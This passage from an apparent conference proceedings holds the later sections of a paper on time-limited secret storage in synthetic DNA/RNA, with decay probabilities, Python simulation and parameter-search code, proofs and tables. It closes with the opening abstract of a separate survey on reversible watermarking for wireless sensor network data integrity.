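    cut_times = [max(rng.expovariate(lam) for _ in range(n)) for _ in range(k)]
    return sorted(cut_times)


rng = random.Random(2023)            # fixed seed, only for reproducibility
t = simulate_cut_times(n=60, k=80, lam=0.001, rng=rng)
a = 24
print(f"first cut t_1 = {t[0]:.0f} min, cut number {a} at {t[a - 1]:.0f} min")
```

Repeating the draw many times gives empirical estimates of the distributions of t_1 and t_a studied in the next subsection.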
4.2 The Information Lifetime Bounds
We consider that the information stored in the NA molecule goes through three different periods that we call: life, agony and death. In this section, we describe each period separately, and give the mathematical model allowing us to determine the bounds of each one of them. Figure 10 shows the different periods represented on a time axis:
Fig. 10. The information lifespan
Life: The information embedded in the NA molecule is fully accessible during the first phase. This happens when no cut has occurred, i.e. for $t \in [0, t_1[$. Let $T_{\min} = \min_{j \le k} T_j$ be the random variable giving the time at which the first cut occurs. We have $t_1 = T_{\min}$ and:

$$P(T_{\min} > t) = \left(1 - (1 - \exp(-\lambda t))^n\right)^k \qquad (2)$$
Agony: Agony starts after the first cut has appeared. From then on, we can only recover the information by brute-force guessing. The probability that a single guess gives the correct secret is equal to $\frac{1}{(x+1)!}$, where $x$ is the number of cuts at time $t$. Agony ends when the $a$-th cut appears, i.e. we have $t \in [t_1, t_a]$.

Death: After the $a$-th cut, we consider the information to be dead: it is no longer feasible to brute-force a recovery of the information. We have $t_a = T_{\max}$ and:

$$P(T_{\max} \le t) = 1 - \sum_{i=0}^{a-1} \binom{k}{i}\, p(t)^i\, (1 - p(t))^{k-i} \qquad (3)$$

with $p(t) = (1 - \exp(-\lambda t))^n$. In this case $t \in\, ]t_a, \infty[$ and it is computationally infeasible within the chosen security parameter to recover the secret information.

Proof. See Appendix A for the derivations of Eq. (2) and Eq. (3).
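Equations (2) and (3) translate directly into code. The sketch below is a plain Python transcription; the function names `cut_probability`, `prob_alive` and `prob_dead` are ours, and the sketch assumes a ≤ k.

```python
from math import comb, exp


def cut_probability(t, n, lam):
    """p(t): probability that a given position is cut (all n copies broken) by time t."""
    return (1.0 - exp(-lam * t)) ** n


def prob_alive(t, n, k, lam):
    """Eq. (2): P(T_min > t), i.e. no cut has occurred by time t."""
    return (1.0 - cut_probability(t, n, lam)) ** k


def prob_dead(t, n, k, a, lam):
    """Eq. (3): P(T_max <= t), i.e. at least a of the k positions are cut by time t."""
    p = cut_probability(t, n, lam)
    fewer_than_a = sum(comb(k, i) * p ** i * (1.0 - p) ** (k - i) for i in range(a))
    return 1.0 - fewer_than_a


# Parameters of the worked example of Sect. 5.1 (lambda in min^-1, times in min).
print(prob_alive(3000, n=150, k=86, lam=0.001))
print(prob_dead(5000, n=150, k=86, a=24, lam=0.001))
```

Both functions are cheap to evaluate, which makes them convenient building blocks for the parameter searches of Sect. 5.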
Fig. 11. Probabilities as functions of the number of copies n, with a fixed number of RNA bonds k = 80 (Left), and as functions of the number of RNA bonds k with a fixed number of copies n = 60 (Right). Here a = 24 and λ = 0.001 min−1 .
We note that $P(T_{\min} > t)$ is increasing in $n$ and decreasing in $k$, $t$ and $\lambda$, and that $P(T_{\max} \le t)$ is increasing in $k$, in $p(t)$ and thus in $t$ and $\lambda$, but decreasing in $n$. See Fig. 11 for an illustration.

Lemma 1 (Evolution of the number of cuts over time). Let $C(t)$ denote the number of cuts at time $t$. $C(t)$ is a random variable and we have:

$$E[C(t)] = k \times (1 - \exp(-\lambda t))^n$$

Proof. See Appendix A.

The following lemma allows us to calculate the expected life spans and their variance.
Lemma 2 (The average time and the variance for the $x$-th cut to appear). The average time when the $x$-th cut appears, $E(t_x)$, and the corresponding variance, $V(t_x)$, are given by the following formulas:

$$E(t_x) = \frac{1}{\lambda} \sum_{s=1}^{kn} C_x(k,n,s), \qquad V(t_x) = \frac{1}{\lambda^2} \left[ 2 \sum_{s=1}^{kn} \frac{C_x(k,n,s)}{s} - \left( \sum_{s=1}^{kn} C_x(k,n,s) \right)^2 \right]$$

where:

$$C_x(k,n,s) = \frac{(-1)^{s+1}}{s} \sum_{m=x}^{k} \sum_{p=0}^{s} \sum_{i=0}^{k-m} (-1)^i \binom{k}{m} \binom{mn}{p} \binom{k-m}{i} \binom{ni}{s-p}$$

Proof. See Appendix A.
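The formulas of Lemma 2 can be evaluated exactly for small parameters. The sketch below uses rational arithmetic, because the sums alternate in sign and involve large binomial coefficients, which would cancel badly in floating point. The names `c_coeff` and `cut_time_moments` are ours, and the triple loop is only practical for small k and n.

```python
from fractions import Fraction
from math import comb


def c_coeff(x, k, n, s):
    """Coefficient C_x(k, n, s) of Lemma 2, as an exact fraction."""
    total = 0
    for m in range(x, k + 1):
        for p in range(s + 1):
            for i in range(k - m + 1):
                total += ((-1) ** i * comb(k, m) * comb(m * n, p)
                          * comb(k - m, i) * comb(n * i, s - p))
    return Fraction((-1) ** (s + 1) * total, s)


def cut_time_moments(x, k, n, lam):
    """Return (E(t_x), V(t_x)) according to Lemma 2."""
    coeffs = [c_coeff(x, k, n, s) for s in range(1, k * n + 1)]
    first = sum(coeffs)
    second = sum(c / s for s, c in enumerate(coeffs, start=1))
    return first / lam, (2 * second - first ** 2) / lam ** 2


# Sanity check on a case known in closed form: one bond, two copies, lam = 1.
# T_1 is the maximum of two Exp(1) variables: mean 1 + 1/2, variance 1 + 1/4.
print(cut_time_moments(x=1, k=1, n=2, lam=1))
```

For realistic sizes (k and n in the tens or hundreds) the number of terms grows quickly, which is consistent with the authors' remark that simulation is faster than the closed formula.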
Fig. 12. E[t24 ] and E[t1 ] as functions of n for k = 40 (Left) and as functions of k for n = 60 (Right)
E(tx ) is increasing in n under fixed k and it is decreasing in k under fixed n. See Fig. 12 for an illustration.
5 Parameter Choice and Efficiency Analysis
This section presents three different methods for tuning the lifetime of the information embedded in the NA molecule. The first method consists of determining the best (n, k) pair to choose. We want the data to still be accessible before some given time t and destroyed after some given time t′, both with a chosen tolerance level for the probability. The second method seeks the optimal (n, k) pair yielding the shortest agony phase compared to the total lifetime, i.e. being able to determine the lifespan as clearly as possible. Finally, in the third method, we describe how to find the best (n, k) pair such that the expected value E(n, k, ta) is very close to some target time ttarget with minimal variance, giving the best guarantee that the data will be destroyed after this time.
5.1 Finding (n, k) for Target Times t and t′
For specific t and t′ values, we want our data to still be accessible up to t and completely destroyed after t′; which (n, k) pair should we consider? To answer this question, n and k should satisfy the following criteria:

$$P(T_{\min} > t) \approx 1 \quad \text{and} \quad P(T_{\max} \le t') \approx 1$$

To this end, we fix a tolerance level Δ, expressed in percent, and require:

$$P(T_{\min} > t) \ge 1 - \Delta' \quad \text{and} \quad P(T_{\max} \le t') \ge 1 - \Delta', \quad \text{with } \Delta' = \Delta \cdot 10^{-2}.$$
Fig. 13. Domains bounds of existing solutions satisfying P(Tmin > 3000) ≥ 96% (blue indicates lower bound) and P(Tmax ≤ 5000) ≥ 96% (orange indicates upper bound). Here Δ = 4 and λ = 0.001 min−1 . The time is in min.
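The two requirements can be checked for any candidate pair with a few lines of Python. The sketch below is not the authors' search code: the function names `is_feasible` and `feasible_k_range` are ours, and the exhaustive scan over k is chosen for clarity rather than speed. It relies on Eq. (2) and Eq. (3) and assumes a ≤ k.

```python
from math import comb, exp


def is_feasible(n, k, t, t_prime, lam, a, delta_percent):
    """Check P(T_min > t) >= 1 - D' and P(T_max <= t') >= 1 - D', D' = delta_percent / 100."""
    tol = delta_percent / 100.0
    p_t = (1.0 - exp(-lam * t)) ** n
    alive = (1.0 - p_t) ** k                                  # Eq. (2) at time t
    p_tp = (1.0 - exp(-lam * t_prime)) ** n
    dead = 1.0 - sum(comb(k, i) * p_tp ** i * (1.0 - p_tp) ** (k - i)
                     for i in range(a))                       # Eq. (3) at time t'
    return alive >= 1.0 - tol and dead >= 1.0 - tol


def feasible_k_range(n, t, t_prime, lam, a, delta_percent, k_max=2000):
    """Return (k_low, k_high) of the feasible k for a given n, or None if there is none."""
    ks = [k for k in range(a, k_max + 1)
          if is_feasible(n, k, t, t_prime, lam, a, delta_percent)]
    return (ks[0], ks[-1]) if ks else None


# Example of Fig. 13: t = 3000 min, t' = 5000 min, lambda = 0.001 min^-1, a = 24.
print(feasible_k_range(150, 3000, 5000, 0.001, 24, 4))
```

Since the first probability decreases with k and the second increases with k, the feasible k for a fixed n form an interval (possibly empty), which corresponds to the region between the two curves of Fig. 13.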
Figure 13 shows that a solution exists at the intersection point of the two curves. For the example in Fig. 13, the solution for t = 3000 min and t′ = 5000 min is (n, k) = (150, 86). This means that if we manufacture 150 NA copies containing 86 RNA nucleotides each, there is a chance of 96% that the secret is still accessible before 3000 min and completely destroyed after 5000 min. Other solutions for other target t and t′ are given in Table 1.

Table 1. (n, k) solutions for different values of target t and t′ (in minutes). Here λ = 0.001 min−1 and Δ = 4

t \ t′   2000         3000          4000           5000
1000     (22, 819)    (17, 74)      (15, 38)       (15, 30)
2000     –            (71, 1243)    (53, 83)       (48, 40)
3000     –            –             (206, 1492)    (150, 86)
4000     –            –             –              (572, 1584)
The results of Fig. 13 and Table 1 were obtained by running a search code in Python, available from the authors. Note that these (n, k) values represent the solutions having the lowest cost in terms of n and k.

5.2 Finding (n, k) with Lowest Agony Ratio
What if we want the data stored in the NA molecule to be fully accessible before some time t and then quickly destroyed after some time t′? Depending on a specified risk level, expressed through α, we want the time from $E(t_1) - \alpha\delta_{t_1}$, where we are confident to have the information fully available, until time $E(t_a) + \alpha\delta_{t_a}$, where we are confident that it is destroyed, to be as short as possible. Here δ is the standard deviation. We thus define the agony ratio as:

$$f(n, k) = \frac{E(t_a) + \alpha\,\delta_{t_a}}{E(t_1) - \alpha\,\delta_{t_1}},$$

and aim to find the (n, k) pair giving the smallest ratio, i.e. being as close to one as possible. Note that the agony ratio f does not depend on λ. This is particularly useful if we can adjust the fluid’s chemical properties to determine the actual life span; refer to Table 7, discussed in Sect. 2.4, to have an idea about the order of magnitude of the time for different values of λ.

We expect, at least for large k and n, that the probabilities $p_1 = P(E(t_1) - \alpha\delta_{t_1} < t_1)$ and $p_2 = P(E(t_a) + \alpha\delta_{t_a} > t_a)$ are close to the ones derived from a normal distribution. This is confirmed by Table 6 in Appendix B, which gives numerical values of p1 and p2 for the cases α = 1 and α = 2. Table 5 in Appendix B shows that we effectively have lower agony ratios when n and k are large; within the tabulated range, the best (n, k) pair is the one with the largest values of n and k. This suggests going further with larger values of n and k, when the resources allow it and when acceptable timings can be found depending on λ.

As an example, we take (n, k) = (280, 280) and we give in Table 2 numerical values for $(t, t') = (E(t_1) - 2\delta_{t_1}, E(t_a) + 2\delta_{t_a})$ for different values of λ and α = 2. In this case, f(280, 280) ≈ 1.41 and (p1, p2) ≈ (0.96, 0.97). Remember that getting other values for (t, t′) requires choosing other values for λ and hence adjusting the chemical properties of the fluid accordingly.

Table 2. The best (t, t′) solutions in terms of the lowest agony ratio for different values of λ. Here (n, k) = (280, 280), α = 2 and a = 24

λ (in min−1)   10−3                4.5 · 10−4        4.06 · 10−5       3.3 · 10−6       1.22 · 10−7
(t, t′)        (57.5, 81.5) hours  (5.3, 7.5) days   (2, 2.8) months   (2, 2.8) years   (53.3, 75.7) years
(p1, p2)       (0.96, 0.97)        (0.96, 0.97)      (0.96, 0.97)      (0.96, 0.97)     (0.96, 0.97)
Agony ratio    1.41                1.41              1.41              1.41             1.41
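The agony ratio can be estimated by simulation, which also illustrates why it does not depend on λ: every cut time scales as 1/λ, so expectations and standard deviations scale in the same way and the factor cancels in the ratio. The Python sketch below is a Monte Carlo estimate under the i.i.d. exponential model; the function name `agony_ratio`, the sample size and the seed are our own choices, and the small (n, k) values are picked only to keep the run short.

```python
import random
import statistics


def agony_ratio(n, k, a, alpha, lam, samples=200, seed=0):
    """Monte Carlo estimate of f(n, k) = (E(t_a) + alpha*sd) / (E(t_1) - alpha*sd)."""
    rng = random.Random(seed)
    first_cut, last_cut = [], []
    for _ in range(samples):
        # Cut times T_j = max over the n copies, sorted to get the order statistics.
        cuts = sorted(max(rng.expovariate(lam) for _ in range(n)) for _ in range(k))
        first_cut.append(cuts[0])
        last_cut.append(cuts[a - 1])
    upper = statistics.mean(last_cut) + alpha * statistics.pstdev(last_cut)
    lower = statistics.mean(first_cut) - alpha * statistics.pstdev(first_cut)
    return upper / lower


# Same seed, two very different degradation rates: the estimates coincide
# up to floating-point rounding.
r_fast = agony_ratio(20, 30, a=24, alpha=1, lam=1e-3)
r_slow = agony_ratio(20, 30, a=24, alpha=1, lam=1.22e-7)
print(r_fast, r_slow)
```

Reproducing the entries of Table 5 would require the larger (n, k) values used there and more samples, at a correspondingly higher running time.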
5.3 Finding (n, k) for Target Time ttarget with the Least Variance
For a target time ttarget we want the secret data to be inaccessible after ttarget; what is the best (n, k) to consider? To answer this question, n and k should satisfy the following approximation:

$$E(n, k, t_a) - t_{target} \approx 0$$

We are therefore looking for (n, k) pairs minimizing the distance between E(ta) and ttarget. However, we also want to be as confident as possible that this is the time at which the information is destroyed. Hence, we prefer the (n, k) pair for which ta has the least variance. Figure 14 represents the optimal (n, k) solutions verifying E(n, k, ta) ≈ 2000 min. We see that we have the least variance when n and k are large. Table 8 gives the corresponding k for each n.
Fig. 14. Optimal solutions for ttarget = 2000 min. The blue lines represent the standard deviation, the red points represent the expected values E(t24 ), and the green ones represent E(t1 ). Here λ = 0.001 min−1
As seen in the last section, when n and k are large, we have a lower agony ratio as well.

Search Algorithm: Our search for the optimal solutions consists of finding the optimal k for each n, which we call kn. The pair (n, kn) ensures ttarget ≈ E(n, kn, ta). We can use the monotonicity properties of E(n, k, ta) to proceed efficiently as follows:

– Initialisation: Start with n = 1 and k = a and compute E(n, k, ta). For fixed n, E(ta) is decreasing with k, and for fixed k, E(ta) is increasing with n. Hence if E(ta) < ttarget, increase n until E(ta) > ttarget.
– Increasing k: We can now increase k until we find E(n, k, ta) ≈ ttarget and we can take kn = k. Since the expected value is monotonically decreasing with k, this is easily determined and can be accelerated via the bisection method. For an integer Δ, consider the interval IΔ = [k, k + Δ] and compute c = g(n, k) · g(n, k + Δ), where g(n, k) = E(n, k, ta) − ttarget. If c < 0, kn ∈ IΔ. In this case bisect IΔ and repeat the same operation. If not, kn > k + Δ and we can choose a new interval starting from k + Δ.
– Increasing n: Bearing in mind that ttarget ≈ E(n, kn, ta) ≤ E(n + 1, kn, ta), kn+1 is either kn or bigger. Hence, in the next iteration for n, we initialise k to kn and proceed using the last step.
– Finally, the optimal (n, kn) value is chosen to minimise the variance of ta.

Remark 1. We can get a wide range of values of λ if we can adjust the chemical parameters such as temperature, pH and the concentration of particular ions. Since E(n, k, ta) and its standard deviation are inversely proportional to λ, this can help us to find even better solutions.

Note that we got all of our numerical values using a Python simulation, since it is faster than working with the theoretical formula of E(ta) directly. Table 8 in Appendix B illustrates our findings of the optimal k for each n for ttarget = 2000 min.
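The search for kn can be sketched as follows. This is not the authors' code: instead of simulation or the closed formula of Lemma 2, the sketch computes E(ta) by numerically integrating the survival function 1 − P(Tmax ≤ t) from Eq. (3), using the standard identity that the mean of a non-negative random variable is the integral of its survival function. It also replaces the bisection step by a plain linear scan for brevity. The names `expected_ta` and `best_k`, the step size and the integration bound are our own assumptions.

```python
from math import comb, exp


def expected_ta(n, k, a, lam, du=0.01, u_max=40.0):
    """Approximate E(t_a) as the integral of P(t_a > t), with u = lam * t.

    Trapezoidal rule on [0, u_max]; the tail beyond u_max is neglected.
    """
    binom = [comb(k, i) for i in range(a)]

    def survival(u):
        p = (1.0 - exp(-u)) ** n               # p(t) of Eq. (3)
        return sum(binom[i] * p ** i * (1.0 - p) ** (k - i) for i in range(a))

    steps = round(u_max / du)
    total = 0.5 * (survival(0.0) + survival(steps * du))
    total += sum(survival(j * du) for j in range(1, steps))
    return total * du / lam


def best_k(n, a, lam, t_target, k_limit=5000):
    """Return the k >= a whose E(t_a) is closest to t_target, or None."""
    previous = None
    for k in range(a, k_limit + 1):
        gap = expected_ta(n, k, a, lam) - t_target
        if gap <= 0:                            # E(t_a) decreases with k
            if previous is None:
                return None                     # even k = a is too short: increase n
            return previous[0] if abs(previous[1]) < abs(gap) else k
        previous = (k, gap)
    return None


print(best_k(n=1, a=24, lam=0.001, t_target=2000))
```

For n = 1 the cut times are plain exponential order statistics, so the result can be cross-checked by hand against the first entry of Table 8.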
6 Conclusion and Future Work
This paper presented a new method for encoding and storing information using synthetic DNA and RNA. We showed that our method allows having information with a foreseeable lifespan. Moreover, we analyzed its security and discussed parameter choice and efficiency. We proposed three different algorithms for tuning the information lifetime. Other media supports, such as bisphenol A thermal fax paper or unstable nonvolatile memory technologies, can be used to implement the same principle, but the decay models of each of those phenomena should be re-computed and the formulae given in this paper adapted. For instance, in the case of thermal paper, the number of copies can be replaced by pixel size.

Future Work: Being aware that having very long oligonucleotides is a synthetic challenge and that it can lead to different rates of hydrolysis compared to small-length oligonucleotides due to the formation of intra- and inter-molecular interactions, our theoretical analysis works as a proof of principle, and the answer to these research questions is left for future work.
A Proofs
Proof of Eq. (2). For time $t$, the probability that the information is still accessible at this moment is given by $P(T_{\min} > t)$ and we have:

$$P(T_{\min} > t) = P(\forall j \le k,\ T_j > t) = \prod_{j=1}^{k} P(T_j > t) = P(T_1 > t)^k = \left(1 - (1 - \exp(-\lambda t))^n\right)^k,$$

and this is true by the definitions of $T_j$ and $L_{i,j}$, and by the independence and identical distribution of $\{T_j\}_{j \le k}$ and $\{L_{i,j}\}_{i \le n, j \le k}$.

Proof of Eq. (3). For time $t$, the probability that the information is completely destroyed after this time is given by $P(T_{\max} \le t)$, where $T_{\max} = T_{(a)}$ and $a$ is the security parameter. We introduce the random variable $Z = \sum_{i=1}^{k} \mathbb{1}(T_i \le t)$ and we define $p(t) = P(T_i \le t) = (1 - \exp(-\lambda t))^n$. We then have:

$$P(T_{\max} \le t) = P(\#\{i \mid T_i \le t\} \ge a) = P(Z \ge a)$$

and thus

$$1 - P(T_{\max} \le t) = \sum_{i=0}^{a-1} \binom{k}{i}\, p(t)^i\, (1 - p(t))^{k-i}.$$

Proof of Lemma 1. The number of cuts as a function of the time is a random process, which we denote by $C(t)$. We can get the expected number of cuts at time $t$ as follows:

$$E[C(t)] = \sum_{i=1}^{k} E[\mathbb{1}_{T_i \le t}] = \sum_{i=1}^{k} \prod_{j=1}^{n} P(L_{j,i} \le t) = k \times P(L_{1,1} \le t)^n = k \times (1 - \exp(-\lambda t))^n,$$

which is true using the independence and identical distribution of the random variables $\{L_{j,i}\}_{j \le n, i \le k}$.

Proof of Lemma 2. This proof is done by calculating three different elements: the cumulative distribution function, the density function and the expected value of $t_x$:

– Cumulative distribution function of $t_x$:

$$
\begin{aligned}
F_{t_x}(t) &= P(\exists\, i_1, \dots, i_x \in [1, k] : T_{i_1}, \dots, T_{i_x} \le t) \\
&= \sum_{m=x}^{k} \binom{k}{m} P(T_1 \le t, \dots, T_m \le t,\ T_{m+1} > t, \dots, T_k > t) \\
&= \sum_{m=x}^{k} \binom{k}{m} P(T_1 \le t)^m \cdot (1 - P(T_1 \le t))^{k-m} \\
&= \sum_{m=x}^{k} \binom{k}{m} (1 - e^{-\lambda t})^{m n} \cdot \left(1 - (1 - e^{-\lambda t})^n\right)^{k-m} \\
&= \sum_{m=x}^{k} \binom{k}{m} \left( \sum_{p=0}^{mn} \binom{mn}{p} (-1)^p e^{-\lambda p t} \right) \cdot \left( \sum_{a=0}^{k-m} \binom{k-m}{a} (-1)^a \left( \sum_{b=0}^{na} \binom{na}{b} (-1)^b e^{-\lambda b t} \right) \right) \\
&= \sum_{m=x}^{k} \sum_{p=0}^{mn} \sum_{a=0}^{k-m} \sum_{b=0}^{na} \binom{k}{m} \binom{mn}{p} \binom{k-m}{a} \binom{na}{b} (-1)^{p+a+b} e^{-\lambda (p+b) t} \\
&= \sum_{m=x}^{k} \sum_{p=0}^{mn} \sum_{a=0}^{k-m} \sum_{s=p}^{na+p} \binom{k}{m} \binom{mn}{p} \binom{k-m}{a} \binom{na}{s-p} (-1)^{s+a} e^{-\lambda s t} \\
&= \sum_{s=0}^{kn} \tilde{C}_x(k, n, s)\, e^{-\lambda s t}
\end{aligned}
$$

This result follows from the independence of $T_i$, for $i \in [1, k]$, and from using the Newton binomial formula three times. Here:

$$
\begin{aligned}
\tilde{C}_x(k, n, s) &= \sum_{m=x}^{k} \sum_{p=0}^{mn} \sum_{a=0}^{k-m} \sum_{b=p}^{na+p} (-1)^{b+a}\, \delta_{b,s} \binom{k}{m} \binom{mn}{p} \binom{k-m}{a} \binom{na}{b-p} \\
&= (-1)^{s} \sum_{m=x}^{k} \sum_{p=0}^{s} \sum_{a=0}^{k-m} (-1)^{a} \binom{k}{m} \binom{mn}{p} \binom{k-m}{a} \binom{na}{s-p}
\end{aligned}
$$

where $\delta_{b,s}$ is the Kronecker delta function.

– Density function of $t_x$:

$$f_{t_x}(t) = F'_{t_x}(t) = \sum_{s=0}^{kn} -\lambda s\, \tilde{C}_x(k, n, s)\, e^{-\lambda s t} = \sum_{s=1}^{kn} -\lambda s\, \tilde{C}_x(k, n, s)\, e^{-\lambda s t}$$

where we start from $s = 1$ since the constant term vanishes after differentiation.

– Expected value of $t_x$:

$$E(t_x) = \int_0^{+\infty} t f_{t_x}(t)\, dt = \sum_{s=1}^{kn} -\lambda s\, \tilde{C}_x(k, n, s) \int_0^{+\infty} t e^{-\lambda s t}\, dt = \frac{1}{\lambda} \sum_{s=1}^{kn} C_x(k, n, s)$$

where $\int_0^{+\infty} t e^{-\lambda s t}\, dt = \frac{1}{\lambda^2 s^2}$ and $C_x(k, n, s) = \frac{-\tilde{C}_x(k, n, s)}{s}$. This result follows from the fact that we have finite sums.

– Variance of $t_x$:

$$
\begin{aligned}
V(t_x) &= E(t_x^2) - E(t_x)^2 = \int_0^{+\infty} t^2 f_{t_x}(t)\, dt - \left( \int_0^{+\infty} t f_{t_x}(t)\, dt \right)^2 \\
&= \sum_{s=1}^{kn} \frac{-2}{\lambda^2 s^2}\, \tilde{C}_x(k, n, s) - \frac{1}{\lambda^2} \left( \sum_{s=1}^{kn} C_x(k, n, s) \right)^2 \\
&= \frac{2}{\lambda^2} \sum_{s=1}^{kn} \frac{C_x(k, n, s)}{s} - \frac{1}{\lambda^2} \left( \sum_{s=1}^{kn} C_x(k, n, s) \right)^2 .
\end{aligned}
$$
B Numerical Values

Table 3. Number of security bits versus number of cuts and DNA fragments. Note that the number of DNA fragments needed is always the number of cuts plus one

Security bits a = log2 (k + 1)!   Number of cuts
a = 84                            24
a = 103                           28
a = 133                           34
a = 260                           57
Table 4. Values of the constants in Eq. (1)

constant   apH      bpH     aK         bK         cK
value      0.983    6       0.24       3.16       3.57
unit       none     none    L.mol−1    mol.L−1    (mol.L−1)^(−dK)

constant   dK       cMg                 dMg     aT      bT
value      −0.419   69.3                0.80    0.07    23
unit       none     (mol.L−1)^(−dMg)    none    °C−1    °C
Table 5. f (n, k) values for different values of n and k. Left α = 1 and Right α = 2

α = 1
n\k    120     160     200     240     280
120    1.50    1.46    1.44    1.42    1.41
160    1.46    1.42    1.40    1.38    1.37
200    1.43    1.40    1.37    1.36    1.34
240    1.41    1.38    1.35    1.34    1.33
280    1.40    1.37    1.34    1.33    1.31

α = 2
n\k    120     160     200     240     280
120    1.67    1.62    1.58    1.56    1.54
160    1.60    1.56    1.53    1.50    1.49
200    1.56    1.52    1.49    1.47    1.45
240    1.53    1.49    1.46    1.44    1.43
280    1.52    1.48    1.44    1.43    1.41
Table 6. (p1, p2) probabilities. Top α = 1 and bottom α = 2. Here λ = 0.001

α = 1
n\k    120             160             200             240             280
120    (0.84, 0.84)    (0.84, 0.84)    (0.84, 0.82)    (0.83, 0.82)    (0.84, 0.84)
160    (0.83, 0.83)    (0.82, 0.83)    (0.82, 0.84)    (0.84, 0.84)    (0.85, 0.86)
200    (0.84, 0.84)    (0.85, 0.86)    (0.85, 0.84)    (0.82, 0.84)    (0.83, 0.82)
240    (0.85, 0.86)    (0.84, 0.83)    (0.85, 0.82)    (0.83, 0.84)    (0.84, 0.83)
280    (0.84, 0.83)    (0.83, 0.84)    (0.84, 0.84)    (0.84, 0.83)    (0.84, 0.84)

α = 2
n\k    120             160             200             240             280
120    (0.97, 0.97)    (0.97, 0.97)    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)
160    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)    (0.95, 0.97)
200    (0.96, 0.97)    (0.97, 0.98)    (0.96, 0.97)    (0.95, 0.97)    (0.96, 0.97)
240    (0.97, 0.98)    (0.96, 0.97)    (0.97, 0.97)    (0.96, 0.97)    (0.96, 0.97)
280    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)    (0.96, 0.97)
Table 7. Order of magnitude of the time for different values of λ

T (°C)   pH      [K+]    [Mg2+]   λ0 (min−1)     λ (min−1)       1/λ
23       13      0.1     0        1.3 · 10−9     10−3            1000 min
23       12.5    0.03    0        1.3 · 10−9     4.5 · 10−4      37 h
37       7.4     0.25    0.005    1.4 · 10−7     4.06 · 10−5     17.1 days
4        10.7    0.25    0.005    1.3 · 10−9     3.3 · 10−6      210.43 days
23       7       0.25    0.005    10−8           1.22 · 10−7     15.5 years
Table 8. Optimal k for n verifying E(n, k, ta) − ttarget ≈ 0. λ = 0.001 and a = 24

n           1     2     3     4     5     6     7     8     9     10
Optimal k   27    31    36    42    49    57    65    76    87    101

n           11    12    13    14    15    16    17    18    19    20
Optimal k   118   136   156   182   210   243   280   324   374   435
References

1. Cheung, Y.-W., et al.: Evolution of abiotic cubane chemistries in a nucleic acid aptamer allows selective recognition of a malaria biomarker. Proc. Natl. Acad. Sci. 117(29), 16790–16798 (2020)
2. Flamme, M., McKenzie, L.K., Sarac, I., Hollenstein, M.: Chemical methods for the modification of RNA. Methods 161, 64–82 (2019)
3. Rijmen, V., Daemen, J.: The Design of Rijndael: AES - The Advanced Encryption Standard. Information Security and Cryptography, Springer, Heidelberg (2002). https://doi.org/10.1007/978-3-662-04722-4
4. Karikó, K., et al.: Incorporation of pseudouridine into mRNA yields superior nonimmunogenic vector with increased translational capacity and biological stability. Mol. Ther. 16(11), 1833–1840 (2008)
5. Kestemont, D., et al.: XNA ligation using T4 DNA ligase in crowding conditions. Chem. Commun. 54(49), 6408–6411 (2018)
6. Kimoto, M., Hirao, I.: Genetic alphabet expansion technology by creating unnatural base pairs. Chem. Soc. Rev. 49(21), 7602–7626 (2020)
7. Kodr, D., et al.: Carborane-or metallacarborane-linked nucleotides for redox labeling. Orthogonal multipotential coding of all four DNA bases for electrochemical analysis and sequencing. Journal of the American Chemical Society 143, 7124–7134 (2021)
8. Kumar, P., Caruthers, M.H.: DNA analogues modified at the nonlinking positions of phosphorus. Acc. Chem. Res. 53(10), 2152–2166 (2020)
9. Li, Y., Breaker, R.R.: Kinetics of RNA degradation by specific base catalysis of transesterification involving the 2’-hydroxyl group (1999)
10. McCloskey, C.M., Liao, J.-Y., Bala, S., Chaput, J.C.: Ligase-mediated threose nucleic acid synthesis on DNA templates. ACS Synthetic Biol. 8(2), 282–286 (2019)
11. McKenzie, L.K., El-Khoury, R., Thorpe, J.D., Damha, M.J., Hollenstein, M.: Recent progress in non-native nucleic acid modifications. Chem. Soc. Rev. 50, 5126–5164 (2021)
12. Mikkola, S., Lönnberg, T., Lönnberg, H.: Phosphodiester models for cleavage of nucleic acids. Beilstein J. Org. Chem. 14(1), 803–837 (2018)
13. Polack, F.P., et al.: Safety and efficacy of the BNT162B2 mRNA Covid-19 vaccine. N. Engl. J. Med. 383(27), 2603–2615 (2020)
14. Renders, M., Miller, E., Hollenstein, M., Perrin, D.: A method for selecting modified DNAzymes without the use of modified DNA as a template in PCR. Chem. Commun. 51(7), 1360–1362 (2015)
15. Wolfenden, R., Snider, M.J.: The depth of chemical time and the power of enzymes as catalysts. Am. Chem. Soc. 34, 938–945 (2001)
16. Sadava, D.E., Hillis, D.M., Heller, H.C.: Life, the science of biology (2009)
17. Verma, S., et al.: Modified oligonucleotides: synthesis and strategy for users. Biochem. 67, 99–134 (1998). 1998 by Annual Reviews
18. Zhou, D.-M., Taira, K.: The hydrolysis of RNA: from theoretical calculations to the hammerhead ribozyme-mediated cleavage of RNA. Chem. Rev. 98(3), 991–1026 (1998)
Evaluation and Analysis of Reversible Watermarking Techniques in WSN for Secure, Lightweight Design of IoT Applications: A Survey Tanya Koohpayeh Araghi1,2(B) , David Megías1,2 , and Andrea Rosales1 1 Internet Interdisciplinary Institute (IN3), Universitat Oberta de Catalunya, Barcelona, Spain
{tkoohpayeharaghi,dmegias,arosales}@uoc.edu 2 Center for Cybersecurity Research of Catalonia (CYBERCAT), Barcelona, Spain
Abstract. Wireless sensor networks (WSNs) are one of the main elements of information acquisition technologies in the Internet of Things (IoT). They are broadly used in managing instruments such as smart meters and health monitoring. The data is prone to manipulation; thus, a secure method is necessary to ensure data integrity. The objectives of this research are to compare lightweight and secure reversible watermarking schemes for data integrity in WSNs; to elaborate on the influential factors affecting system performance; to describe the overhead of each security factor in terms of time, memory and energy consumption with regard to computational complexity; and, finally, to assess the robustness of each scheme against attacks. We expect the results of this research to inspire researchers to design secure IoT applications, such as smart meters, by extending these measurements. We also propose several tips for designing lightweight and secure data integrity methods in IoT.

Keywords: Wireless Sensor Networks · IoT security · Reversible watermarking · Authentication · Threat countermeasure · Data integrity
